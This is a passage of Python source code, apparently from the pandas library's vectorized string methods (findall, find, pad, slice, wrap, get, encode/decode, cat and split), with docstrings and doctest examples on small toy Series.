2 NaN
3 NaN
4 NaN
dtype: object
"""
return _na_map(sep.join, arr)
def str_findall(arr, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
regex = re.compile(pat, flags=flags)
return _na_map(regex.findall, arr)
def str_find(arr, sub, start=0, end=None, side="left"):
"""
Return indexes in each strings in the Series/Index where the
substring is fully contained between [start:end]. Return -1 on failure.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
side : {'left', 'right'}, default 'left'
Specifies a starting side, equivalent to ``find`` or ``rfind``.
Returns
-------
Series or Index
Indexes where substring is found.
"""
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "find"
elif side == "right":
method = "rfind"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_index(arr, sub, start=0, end=None, side="left"):
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "index"
elif side == "right":
method = "rindex"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_pad(arr, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills boths sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = "fillchar must be a character, not {0}"
raise TypeError(msg.format(type(fillchar).__name__))
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = "width must be of integer type, not {0}"
raise TypeError(msg.format(type(width).__name__))
if side == "left":
f = lambda x: x.rjust(width, fillchar)
elif side == "right":
f = lambda x: x.ljust(width, fillchar)
elif side == "both":
f = lambda x: x.center(width, fillchar)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_split(arr, pat=None, n=None):
if pat is None:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if len(pat) == 1:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if n is None or n == -1:
n = 0
regex = re.compile(pat)
f = lambda x: regex.split(x, maxsplit=n)
res = _na_map(f, arr)
return res
def str_rsplit(arr, pat=None, n=None):
if n is None or n == 0:
n = -1
f = lambda x: x.rsplit(pat, n)
res = _na_map(f, arr)
return res
def str_slice(arr, start=None, stop=None, step=None):
"""
Slice substrings from each element in the Series or Index.
Parameters
----------
start : int, optional
Start position for slice operation.
stop : int, optional
Stop position for slice operation.
step : int, optional
Step size for slice operation.
Returns
-------
Series or Index of object
Series or Index from sliced substring from original string object.
See Also
--------
Series.str.slice_replace : Replace a slice with a string.
Series.str.get : Return element at position.
Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
being the position.
Examples
--------
>>> s = pd.Series(["koala", "fox", "chameleon"])
>>> s
0 koala
1 fox
2 chameleon
dtype: object
>>> s.str.slice(start=1)
0 oala
1 ox
2 hameleon
dtype: object
>>> s.str.slice(stop=2)
0 ko
1 fo
2 ch
dtype: object
>>> s.str.slice(step=2)
0 kaa
1 fx
2 caeen
dtype: object
>>> s.str.slice(start=0, stop=5, step=3)
0 kl
1 f
2 cm
dtype: object
Equivalent behaviour to:
>>> s.str[0:5:3]
0 kl
1 f
2 cm
dtype: object
"""
obj = slice(start, stop, step)
f = lambda x: x[obj]
return _na_map(f, arr)
def str_slice_replace(arr, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
if repl is None:
repl = ""
def f(x):
if x[start:stop] == "":
local_stop = start
else:
local_stop = stop
y = ""
if start is not None:
y += x[:start]
y += repl
if stop is not None:
y += x[local_stop:]
return y
return _na_map(f, arr)
def str_strip(arr, to_strip=None, side="both"):
"""
Strip whitespace (including newlines) from each string in the
Series/Index.
Parameters
----------
to_strip : str or unicode
side : {'left', 'right', 'both'}, default 'both'
Returns
-------
Series or Index
"""
if side == "both":
f = lambda x: x.strip(to_strip)
elif side == "left":
f = lambda x: x.lstrip(to_strip)
elif side == "right":
f = lambda x: x.rstrip(to_strip)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_wrap(arr, width, **kwargs):
r"""
Wrap long strings in the Series/Index to be formatted in
paragraphs with length less than a given width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
kwargs["width"] = width
tw = textwrap.TextWrapper(**kwargs)
return _na_map(lambda s: "\n".join(tw.wrap(s)), arr)
def str_translate(arr, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
return _na_map(lambda x: x.translate(table), arr)
def str_get(arr, i):
"""
Extract element from each component at specified position.
Extract element from lists, tuples, or strings in each element in the
Series/Index.
Parameters
----------
i : int
Position of element to extract.
Returns
-------
Series or Index
Examples
--------
>>> s = pd.Series(["String",
... (1, 2, 3),
... ["a", "b", "c"],
... 123,
... -456,
... {1: "Hello", "2": "World"}])
>>> s
0 String
1 (1, 2, 3)
2 [a, b, c]
3 123
4 -456
5 {1: 'Hello', '2': 'World'}
dtype: object
>>> s.str.get(1)
0 t
1 2
2 b
3 NaN
4 NaN
5 Hello
dtype: object
>>> s.str.get(-1)
0 g
1 3
2 c
3 NaN
4 NaN
5 None
dtype: object
"""
def f(x):
if isinstance(x, dict):
return x.get(i)
elif len(x) > i >= -len(x):
return x[i]
return np.nan
return _na_map(f, arr)
def str_decode(arr, encoding, errors="strict"):
"""
Decode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode` in
python3.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
Series or Index
"""
if encoding in _cpython_optimized_decoders:
# CPython optimized implementation
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
return _na_map(f, arr)
def str_encode(arr, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
if encoding in _cpython_optimized_encoders:
# CPython optimized implementation
f = lambda x: x.encode(encoding, errors)
else:
encoder = codecs.getencoder(encoding)
f = lambda x: encoder(x, errors)[0]
return _na_map(f, arr)
def forbid_nonstring_types(forbidden, name=None):
"""
Decorator to forbid specific types for a method of StringMethods.
For calling `.str.{method}` on a Series or Index, it is necessary to first
initialize the :class:`StringMethods` object, and then call the method.
However, different methods allow different input types, and so this can not
be checked during :meth:`StringMethods.__init__`, but must be done on a
per-method basis. This decorator exists to facilitate this process, and
make it explicit which (inferred) types are disallowed by the method.
:meth:`StringMethods.__init__` allows the *union* of types its different
methods allow (after skipping NaNs; see :meth:`StringMethods._validate`),
namely: ['string', 'empty', 'bytes', 'mixed', 'mixed-integer'].
The default string types ['string', 'empty'] are allowed for all methods.
For the additional types ['bytes', 'mixed', 'mixed-integer'], each method
then needs to forbid the types it is not intended for.
Parameters
----------
forbidden : list-of-str or None
List of forbidden non-string types, may be one or more of
`['bytes', 'mixed', 'mixed-integer']`.
name : str, default None
Name of the method to use in the error message. By default, this is
None, in which case the name from the method being wrapped will be
copied. However, for working with further wrappers (like _pat_wrapper
and _noarg_wrapper), it is necessary to specify the name.
Returns
-------
func : wrapper
The method to which the decorator is applied, with an added check that
enforces the inferred type to not be in the list of forbidden types.
Raises
------
TypeError
If the inferred type of the underlying data is in `forbidden`.
"""
# deal with None
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
"Cannot use .str.{name} with values of inferred dtype "
"{inf_type!r}.".format(
name=func_name, inf_type=self._inferred_dtype
)
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
def _noarg_wrapper(f, name=None, docstring=None, forbidden_types=["bytes"], **kargs):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper(self):
result = _na_map(f, self._parent, **kargs)
return self._wrap_result(result)
wrapper.__name__ = f.__name__ if name is None else name
if docstring is not None:
wrapper.__doc__ = docstring
else:
raise ValueError("Provide docstring")
return wrapper
def _pat_wrapper(
f, flags=False, na=False, name=None, forbidden_types=["bytes"], **kwargs
):
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper1(self, pat):
result = f(self._parent, pat)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper2(self, pat, flags=0, **kwargs):
result = f(self._parent, pat, flags=flags, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(forbidden_types, name=name)
def wrapper3(self, pat, na=np.nan):
result = f(self._parent, pat, na=na)
return self._wrap_result(result)
wrapper = wrapper3 if na else wrapper2 if flags else wrapper1
wrapper.__name__ = f.__name__ if name is None else name
if f.__doc__:
wrapper.__doc__ = f.__doc__
return wrapper
def copy(source):
"Copy a docstring from another source function (if present)"
def do_copy(target):
if source.__doc__:
target.__doc__ = source.__doc__
return target
return do_copy
class StringMethods(NoNewAttributesMixin):
"""
Vectorized string functions for Series and Index. NAs stay NA unless
handled otherwise by a particular method. Patterned after Python's string
methods, with some inspiration from R's stringr package.
Examples
--------
>>> s.str.split('_')
>>> s.str.replace('_', '')
"""
def __init__(self, data):
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data)
# .values.categories works for both Series/Index
self._parent = data.values.categories if self._is_categorical else data
# save orig to blow up categoricals to the right type
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
"""
Auxiliary function for StringMethods, infers and checks dtype of data.
This is a "first line of defence" at the creation of the StringMethods-
object (see _make_accessor), and just checks that the dtype is in the
*union* of the allowed types over all string methods below; this
restriction is then refined on a per-method basis using the decorator
@forbid_nonstring_types (more info in the corresponding docstring).
This really should exclude all series/index with any non-string values,
but that isn't practical for performance reasons until we have a str
dtype (GH 9343 / 13877)
Parameters
----------
data : The content of the Series
Returns
-------
dtype : inferred dtype of data
"""
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, " "not MultiIndex"
)
# see _libs/lib.pyx for list of inferred types
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data) # Series / Index
values = getattr(values, "categories", values) # categorical / normal
try:
inferred_dtype = lib.infer_dtype(values, skipna=True)
except ValueError:
# GH#27571 mostly occurs with ExtensionArray
inferred_dtype = None
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string " "values!")
return inferred_dtype
def __getitem__(self, key):
if isinstance(key, slice):
return self.slice(start=key.start, stop=key.stop, step=key.step)
else:
return self.get(key)
def __iter__(self):
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self, result, use_codes=True, name=None, expand=None, fill_value=np.nan
):
from pandas import Index, Series, MultiIndex
# for category, we do the stuff on the categories, so blow it up
# to the full series again
# But for some operations, we have to do the stuff on the full values,
# so make it possible to skip this step as the method already did this
# before the transformation...
if use_codes and self._is_categorical:
# if self._orig is a CategoricalIndex, there is no .cat-accessor
result = take_1d(
result, Series(self._orig, copy=False).cat.codes, fill_value=fill_value
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
return result
assert result.ndim < 3
if expand is None:
# infer from ndim if expand is not specified
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, Index):
# required when expand=True is explicitly specified
# not needed when inferred
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
# propagate nan values to match longest sequence (GH 18450)
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
# if expand is False, result should have the same name
# as the original otherwise specified
if name is None:
name = getattr(result, "name", None)
if name is None:
# do not use logical or, _orig may be a DataFrame
# which has "name" column
name = self._orig.name
# Wait until we are sure result is a Series or Index before
# checking attributes (GH 12180)
if isinstance(self._orig, Index):
# if result is a boolean np.array, return the np.array
# instead of wrapping it into a boolean Index (GH 8875)
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
# We had all tuples of length-one, which are
# better represented as a regular Index.
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
if expand:
cons = self._orig._constructor_expanddim
return cons(result, columns=name, index=index)
else:
# Must be a Series
cons = self._orig._constructor
return cons(result, name=name, index=index)
def _get_series_list(self, others, ignore_index=False):
"""
Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
into a list of Series (elements without an index must match the length
of the calling Series/Index).
Parameters
----------
others : Series, Index, DataFrame, np.ndarray, list-like or list-like
of objects that are Series, Index or np.ndarray (1-dim)
ignore_index : boolean, default False
Determines whether to forcefully align others with index of caller
Returns
-------
tuple : (others transformed into list of Series,
boolean whether FutureWarning should be raised)
"""
# Once str.cat defaults to alignment, this function can be simplified;
# will not need `ignore_index` and the second boolean output anymore
from pandas import Index, Series, DataFrame
# self._orig is either Series or Index
idx = self._orig if isinstance(self._orig, Index) else self._orig.index
err_msg = (
"others must be Series, Index, DataFrame, np.ndarray or "
"list-like (either containing only strings or containing "
"only objects of type Series/Index/list-like/np.ndarray)"
)
# Generally speaking, all objects without an index inherit the index
# `idx` of the calling Series/Index - i.e. must have matching length.
# Objects with an index (i.e. Series/Index/DataFrame) keep their own
# index, *unless* ignore_index is set to True.
if isinstance(others, Series):
warn = not others.index.equals(idx)
# only reconstruct Series when absolutely necessary
los = [
Series(others.values, index=idx) if ignore_index and warn else others
]
return (los, warn)
elif isinstance(others, Index):
warn = not others.equals(idx)
los = [Series(others.values, index=(idx if ignore_index else others))]
return (los, warn)
elif isinstance(others, DataFrame):
warn = not others.index.equals(idx)
if ignore_index and warn:
# without copy, this could change "others"
# that was passed to str.cat
others = others.copy()
others.index = idx
return ([others[x] for x in others], warn)
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return ([others[x] for x in others], False)
elif is_list_like(others, allow_sets=False):
others = list(others) # ensure iterators do not get read twice etc
# in case of list-like `others`, all elements must be
# either one-dimensional list-likes or scalars
if all(is_list_like(x, allow_sets=False) for x in others):
los = []
join_warn = False
depr_warn = False
# iterate through list and append list of series for each
# element (which we check to be one-dimensional and non-nested)
while others:
nxt = others.pop(0) # nxt is guaranteed list-like by above
# GH 21950 - DeprecationWarning
# only allowing Series/Index/np.ndarray[1-dim] will greatly
# simply this function post-deprecation.
if not (
isinstance(nxt, (Series, Index))
or (isinstance(nxt, np.ndarray) and nxt.ndim == 1)
):
depr_warn = True
if not isinstance(nxt, (DataFrame, Series, Index, np.ndarray)):
# safety for non-persistent list-likes (e.g. iterators)
# do not map indexed/typed objects; info needed below
nxt = list(nxt)
# known types for which we can avoid deep inspection
no_deep = (
isinstance(nxt, np.ndarray) and nxt.ndim == 1
) or isinstance(nxt, (Series, Index))
# nested list-likes are forbidden:
# -> elements of nxt must not be list-like
is_legal = (no_deep and nxt.dtype == object) or all(
not is_list_like(x) for x in nxt
)
# DataFrame is false positive of is_legal
# because "x in df" returns column names
if not is_legal or isinstance(nxt, DataFrame):
raise TypeError(err_msg)
nxt, wnx = self._get_series_list(nxt, ignore_index=ignore_index)
los = los + nxt
join_warn = join_warn or wnx
if depr_warn:
warnings.warn(
"list-likes other than Series, Index, or "
"np.ndarray WITHIN another list-like are "
"deprecated and will be removed in a future "
"version.",
FutureWarning,
stacklevel=4,
)
return (los, join_warn)
elif all(not is_list_like(x) for x in others):
return ([Series(others, index=idx)], False)
raise TypeError(err_msg)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join=None):
"""
Concatenate strings in the Series/Index with given separator.
If `others` is specified, this function concatenates the Series/Index
and elements of `others` element-wise.
If `others` is not passed, then all values in the Series/Index are
concatenated into a single string with a given `sep`.
Parameters
----------
others : Series, Index, DataFrame, np.ndarray or list-like
Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
other list-likes of strings must have the same length as the
calling Series/Index, with the exception of indexed objects (i.e.
Series/Index/DataFrame) if `join` is not None.
If others is a list-like that contains a combination of Series,
Index or np.ndarray (1-dim), then all elements will be unpacked and
must satisfy the above criteria individually.
If others is None, the method returns the concatenation of all
strings in the calling Series/Index.
sep : str, default ''
The separator between the different elements/columns. By default
the empty string `''` is used.
na_rep : str or None, default None
Representation that is inserted for all missing values:
- If `na_rep` is None, and `others` is None, missing values in the
Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row containing a
missing value in any of the columns (before concatenation) will
have a missing value in the result.
join : {'left', 'right', 'outer', 'inner'}, default None
Determines the join-style between the calling Series/Index and any
Series/Index/DataFrame in `others` (objects without an index need
to match the length of the calling Series/Index). If None,
alignment is disabled, but this option will be removed in a future
version of pandas and replaced with a default of `'left'`. To
disable alignment, use `.values` on any Series/Index/DataFrame in
`others`.
.. versionadded:: 0.23.0
Returns
-------
str, Series or Index
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of objects is returned.
See Also
--------
split : Split each string in the Series/Index.
join : Join lists contained as elements in the Series/Index.
Examples
--------
When not passing `others`, all values are concatenated into a single
string:
>>> s = pd.Series(['a', 'b', np.nan, 'd'])
>>> s.str.cat(sep=' ')
'a b d'
By default, NA values in the Series are ignored. Using `na_rep`, they
can be given a representation:
>>> s.str.cat(sep=' ', na_rep='?')
'a b ? d'
If `others` is specified, corresponding values are concatenated with
the separator. Result will be a Series of strings.
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
0 a,A
1 b,B
2 NaN
3 d,D
dtype: object
Missing values will remain missing in the result, but can again be
represented using `na_rep`
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
0 a,A
1 b,B
2 -,C
3 d,D
dtype: object
If `sep` is not specified, the values are concatenated without
separation.
>>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
0 aA
1 bB
2 -C
3 dD
dtype: object
Series with different indexes can be aligned before concatenation. The
`join`-keyword works as in other methods.
>>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
>>> s.str.cat(t, join='left', na_rep='-')
0 aa
1 b-
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='outer', na_rep='-')
0 aa
1 b-
2 -c
3 dd
4 -e
dtype: object
>>>
>>> s.str.cat(t, join='inner', na_rep='-')
0 aa
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='right', na_rep='-')
3 dd
0 aa
4 -e
2 -c
dtype: object
For more examples, see :ref:`here <text.concatenate>`.
"""
from pandas import Index, Series, concat
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, Index):
data = Series(self._orig, index=self._orig)
else: # Series
data = self._orig
# concatenate Series/Index with itself if no "others"
if others is None:
data = ensure_object(data)
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
# turn anything in "others" into lists of Series
others, warn = self._get_series_list(others, ignore_index=(join is None))
except ValueError: # do not catch TypeError raised by _get_series_list
if join is None:
raise ValueError(
"All arrays must be same length, except "
"those having an index if `join` is not None"
)
else:
raise ValueError(
"If `others` contains arrays or lists (or "
"other list-likes without an index), these "
"must all be of the same length as the "
"calling Series/Index."
)
if join is None and warn:
warnings.warn(
"A future version of pandas will perform index "
"alignment when `others` is a Series/Index/"
"DataFrame (or a list-like containing one). To "
"disable alignment (the behavior before v.0.23) and "
"silence this warning, use `.values` on any Series/"
"Index/DataFrame in `others`. To enable alignment "
"and silence this warning, pass `join='left'|"
"'outer'|'inner'|'right'`. The future default will "
"be `join='left'`.",
FutureWarning,
stacklevel=3,
)
# if join is None, _get_series_list already force-aligned indexes
join = "left" if join is None else join
# align if required
if any(not data.index.equals(x.index) for x in others):
# Need to add keys for uniqueness in case of duplicate columns
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others] # again list of Series
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
# no na_rep means NaNs for all rows where any column has a NaN
# only necessary if there are actually any NaNs
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
# fill NaNs with na_rep in case there are actually any NaNs
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
# no NaNs - can just concatenate
result = cat_safe(all_cols, sep)
if isinstance(self._orig, Index):
# add dtype for case that result is all-NA
result = Index(result, dtype=object, name=self._orig.name)
else: # Series
result = Series(
result, dtype=object, index=data.index, name=self._orig.name
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the splitted strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(["this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan])
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat = "/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3
0 this is a regular
1 https://docs.python.org/3/tutorial/index.html None None None
2 NaN NaN NaN NaN \
4
0 sentence
1 None
2 NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = str_split(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
